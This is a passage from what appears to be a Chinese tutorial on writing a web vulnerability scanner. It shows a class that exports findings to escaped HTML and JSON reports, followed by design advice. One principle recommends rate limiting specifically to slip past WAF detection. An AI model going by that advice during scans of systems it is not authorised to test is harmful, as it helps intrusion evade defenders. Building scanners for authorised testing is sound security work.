        .finding .severity { display: inline-block; padding: 3px 10px; 
                            border-radius: 3px; color: white; font-size: 12px; 
                            font-weight: bold; }
        pre { background: #2d2d2d; color: #f8f8f2; padding: 15px; 
              border-radius: 6px; overflow-x: auto; }
        code { font-family: 'Fira Code', monospace; }
    </style>
</head>
<body>
    <h1>🔍 Web漏洞扫描报告</h1>
    <p><strong>扫描时间:</strong>{scan_time}</p>
    <p><strong>目标URL:</strong>{target_url}</p>
    
    <h2>统计概览</h2>
    <div class="summary">
        {summary_cards}
    </div>
    
    <h2>漏洞详情</h2>
    {findings_html}
    
    <footer style="margin-top: 50px; color: #999; font-size: 12px;">
        Generated by Security Scanner v1.0 - {gen_time}
    </footer>
</body>
</html>
"""
    
    def __init__(self, target_url: str):
        self.target_url = target_url
        self.findings: List[Vulnerability] = []
    
    def add_finding(self, vuln: Vulnerability):
        self.findings.append(vuln)
    
    def add_findings(self, vulns: List[Vulnerability]):
        self.findings.extend(vulns)
    
    def generate_html(self, output_path: str):
        """生成HTML报告"""
        # 统计
        severity_count = {}
        for v in self.findings:
            sev = v.severity.value
            severity_count[sev] = severity_count.get(sev, 0) + 1
        
        # 生成摘要卡片
        colors = {"critical": "critical", "high": "high", 
                  "medium": "medium", "low": "low", "info": "info"}
        cards = []
        for sev, cls in colors.items():
            count = severity_count.get(sev, 0)
            cards.append(
                f'<div class="stat {cls}">{sev.upper()}<br><small>{count}</small></div>'
            )
        
        # 生成漏洞详情
        findings_html_parts = []
        for i, v in enumerate(self.findings, 1):
            finding_html = f"""
            <div class="finding">
                <h3>[{i}] {html.escape(v.name)} 
                    <span class="severity" style="background: {
                        '#e74c3c' if v.severity.value == 'critical' else
                        '#e67e22' if v.severity.value == 'high' else
                        '#f39c12' if v.severity.value == 'medium' else
                        '#3498db' if v.severity.value == 'low' else '#95a5a6'
                    }">{v.severity.value.upper()}</span>
                </h3>
                <p><strong>URL: </strong>{html.escape(v.url)}</p>
                <p><strong>Parameter: </strong>{html.escape(v.parameter)}</p>
                <p><strong>Payload: </strong><code>{html.escape(v.payload)}</code></p>
                <p><strong>CWE: </strong>{v.cwe_id or 'N/A'}</p>
                <p><strong>Description: </strong>{html.escape(v.description)}</p>
                <p><strong>Evidence: </strong></p>
                <pre>{html.escape(v.evidence)}</pre>
                <p><strong>Remediation: </strong>{html.escape(v.remediation or 'N/A')}</p>
            </div>
            """
            findings_html_parts.append(finding_html)
        
        # 组装HTML
        html_content = self.HTML_TEMPLATE.format(
            scan_time=datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
            target_url=html.escape(self.target_url),
            summary_cards='\n'.join(cards),
            findings_html='\n'.join(findings_html_parts) or "<p>✅ 未发现漏洞</p>",
            gen_time=datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        )
        
        Path(output_path).parent.mkdir(parents=True, exist_ok=True)
        with open(output_path, 'w', encoding='utf-8') as f:
            f.write(html_content)
        
        print(f"[+] HTML report saved to {output_path}")
    
    def generate_json(self, output_path: str):
        """生成JSON报告"""
        report = {
            "scan_time": datetime.now().isoformat(),
            "target_url": self.target_url,
            "total_findings": len(self.findings),
            "findings": [
                {
                    "name": v.name,
                    "description": v.description,
                    "severity": v.severity.value,
                    "url": v.url,
                    "parameter": v.parameter,
                    "payload": v.payload,
                    "evidence": v.evidence,
                    "cvss_score": v.cvss_score,
                    "cwe_id": v.cwe_id,
                    "remediation": v.remediation
                }
                for v in self.findings
            ]
        }
        
        with open(output_path, 'w', encoding='utf-8') as f:
            json.dump(report, f, indent=2, ensure_ascii=False)
        
        print(f"[+] JSON report saved to {output_path}")

七、总结与最佳实践

自建扫描器的核心在于模块化设计可扩展性——今天你可能只需要SQL注入检测,明天可能需要添加SSRF、XXE、SSTI等检测模块。良好的插件系统让你可以像搭积木一样扩展扫描能力。

几个关键的设计原则:

  1. 异步优先:asyncio + aiohttp 组合让并发扫描效率比多线程方案高出数倍
  2. 速率可控:自适应速率限制避免触发WAF的速率检测
  3. Payload可管理:YAML格式让Payload库易于维护和共享
  4. 结果结构化:漏洞数据结构化存储,便于后续分析和联动

完整代码建议组织为Python包,配合Click/Fire等CLI框架提供命令行入口,让扫描器成为渗透测试工具箱中的瑞士军刀。